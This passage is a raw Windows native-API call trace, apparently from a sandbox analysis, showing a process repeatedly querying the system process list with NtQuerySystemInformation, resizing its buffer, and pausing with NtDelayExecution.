0x0 [0134.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.975] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0134.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0134.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0134.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0134.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0134.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0134.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0134.991] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.007] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.022] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.038] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.054] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.070] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.121] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.146] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.163] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.197] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.211] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.225] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.256] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.290] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.319] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.334] 